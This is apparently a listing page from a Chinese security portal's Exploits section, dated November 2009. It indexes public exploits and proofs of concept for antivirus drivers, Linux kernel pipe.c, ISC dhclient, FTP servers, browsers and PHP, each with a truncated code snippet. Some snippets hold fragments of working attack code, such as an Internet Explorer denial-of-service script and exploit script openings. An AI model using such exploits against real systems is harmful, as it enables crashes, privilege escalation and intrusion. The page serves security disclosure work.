首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Adobe browser document ActiveX DoS vulnerablity
  日期:2009-11-19 11:26:29 点击:57 评论:0
Adobe browser document ActiveX DoS vulnerablityFile: AcroPDF.dllAffected version : 7.0.5 . Later versions are also effectedDescription:RegKey Safe for Script: TrueRegKey Safe for Init: TruePOC:Create a HTML file with following Code and test it on IE
Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption
  日期:2009-11-18 11:26:13 点击:44 评论:0
/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption * * Author: Giuseppe 'Evilcry' Bonfa' * E-Mail: evilcry _AT_ gmail _DOT_ com * Website: http://evilcry.netsons.org * http://evilcodecave.blogspot.com * http://evilfingers.com * * Ve
Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
  日期:2009-11-18 11:24:15 点击:39 评论:0
# Exploit Title: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability # Date: 2009-11-17 # Author: karak0rsan # Software Link: [downoad link if available] # Version: Novell eDirectory 8.8 SP5 HTTPSTK # Tested on: [relevant os] # Code : [expl
Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)
  日期:2009-11-18 11:23:17 点击:30 评论:0
#!/user/bin/perl #Icarus 2.0 (.PGn File)Universal Local BOF (SEH) #tested on win SP2 #Author: germaya_x D3v!LFUCK3R #Download :http://www.randomsoftware.com/pub/icarus.exe #GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :
Home FTP Server 'MKD' Command Directory Traversal Vulnerability
  日期:2009-11-18 11:21:01 点击:33 评论:0
#!/usr/bin/python import socket import sys def Usage(): print (Usage: ./expl.py serv_ip Username passwordn) print (Example:./expl.py 192.168.48.183 anonymous anonymousn) if len(sys.argv) 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=s
Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
  日期:2009-11-18 11:11:04 点击:39 评论:0
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption** Author(s): Giuseppe 'Evilcry' Bonfa'* AbdulAziz Hariri* E-Mail: evilcry _AT_ gmail _DOT_ com* Website: http://evilcry.netsons.org* http://evilcodecave.blogspot.com* http://evilcodecav
Local DoS - Kaspersky 2010 9.0.0.463
  日期:2009-11-18 11:09:34 点击:22 评论:0
/*Program : Kaspersky Anti-Virus 2010 9.0.0.463Homepage : http://www.kaspersky.comDiscovery : 2009/09/29Author Contacted : 2009/10/01Patch Updated : 2009/11/16Found by : HeursThis Advisory : HeursContact : s.leberre@sysdream.com//----- Application d
PHP versions 5.2.11 and 5.3.0 suffer from a symlink() open_basedir bypass vulner
  日期:2009-11-17 18:07:37 点击:51 评论:0
?php/*PHP 5.2.11/5.3.0 symlink() open_basedir bypass by Maksymilian Arciemowicz http://securityreason.com/cxib [ a.T] securityreason [ d0t] comCHUJWAMWMUZG*/$fakedir=cx;$fakedep=16;$num=0; // offset of symlink.$numif(!empty( ___FCKpd___0 GET['file']
ISC DHCP dhclient < 3.1.2p1 Remote Exploit
  日期:2009-11-17 18:06:45 点击:68 评论:0
/* * cve-2009-0692.c * * ISC DHCP dhclient 3.1.2p1 Remote Exploit * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 * * Stack-based buffer overflow in the sc
AIMP2 versions 2.51 build 330 and below audio converter playlist buffer overflow
  日期:2009-11-17 18:04:39 点击:58 评论:0
# [*] Vulnerability : AIMP2 Audio Converter Playlist (pls) BOF# [*] Discovered by : mr_me (http://milw0rm.com/exploits/9561)# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)# [*] Sploit written : nov 7th, 2009# [*] Sploit releas
XM Easy Personal FTP Server version 5.8.0 remote denial of service exploit
  日期:2009-11-17 18:01:43 点击:42 评论:0
Date of Discovery: 10-Nov-2009Credits:zhangmc[at]mail.ustc.edu.cnVendor: DxmsoftAffected:XM Easy Personal FTP Server 5.8.0Earlier versions may also be affectedOverview:XM Easy Personal FTP Server is a easy use FTP server Application. Denial of servi
Windows 7 / Server 2008R2 Remote Kernel Crash
  日期:2009-11-16 12:20:54 点击:74 评论:0
This bug is a real proof that SDL #FAIL The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed... Can be trigered outside the lan via (IE*) The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ev
Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
  日期:2009-11-10 10:48:37 点击:38 评论:0
#!/usr/bin/perl # ithinkthereforeiexist.pl # AKA # Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit # # Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 11.09.2009 # # *********************************************
Internet Explorer DoS Exploit (C) 2009 MustLive
  日期:2009-11-10 10:47:59 点击:40 评论:0
html head titleInternet Explorer DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua/title script function DoS() { document.getElementById(dos).click(); setTimeout(DoS,1); } /script /head body onload=DoS() div align=centera id=dos href=# onClick
Linux 2.6.31 fs/pipe.c local root exploit (CVE-2009-3547)
  日期:2009-11-09 10:14:20 点击:170 评论:0
/****************************************************************************** * .:: Impel Down ::. * * Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86) * by teach xipe * Greetz goes to all our mates from #nibbles, #oldschool and #carib0
Linux 2.6.x fs/pipe.c local root exploit (CVE-2009-3547)
  日期:2009-11-09 10:12:17 点击:487 评论:0
/****************************************************************************** * .:: Impel Down ::. * * Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86) * by teach xipe * Greetz goes to all our mates from #nibbles, #oldschool and #carib0
Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
  日期:2009-11-09 10:11:23 点击:65 评论:0
# This is a PoC based off the PoC release by Earl Chew# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability# PoC by Matthew Bergin# Bugtraq ID: 36901import osimport timeimport random#infinite loopwhile (i == 0): os.system(sleep 1) while
This is a proof of concept exploit for the man-in-the-middle vulnerability relat
  日期:2009-11-09 10:07:48 点击:91 评论:0
#include errno.h #include stdio.h #include string.h #include unistd.h #include sys/time.h #include sys/socket.h #include netinet/in.h #include arpa/inet.h #include netdb.h #include openssl/ssl.h #include openssl/ssl3.h void fail(const char *proc) {
E-doo music get shell Vulnerability
  日期:2009-11-06 10:28:12 点击:78 评论:0
index.php line 10 $data_name =get_date(); ...... $from = $_SERVER [ HTTP_REFERER ]; ...... if ( file_exists ( $sys_data_dir/stat/$data_name.php )) { $stat_data =file( $sys_data_dir/stat/$data_name.php ); for ( $a =0; $a count ( $stat_data ); $a ++) {
Blender .blend Project Arbitrary Command Execution
  日期:2009-11-06 10:27:18 点击:85 评论:0
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/Blender .blend Project Arbitrary Command Execution1. *Advisory Information*Title: Blender .blend Project Arbitrary Comma
共637页/12733条记录 首页 上一页 [417] [418] [419] 420 [421] [422] [423] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved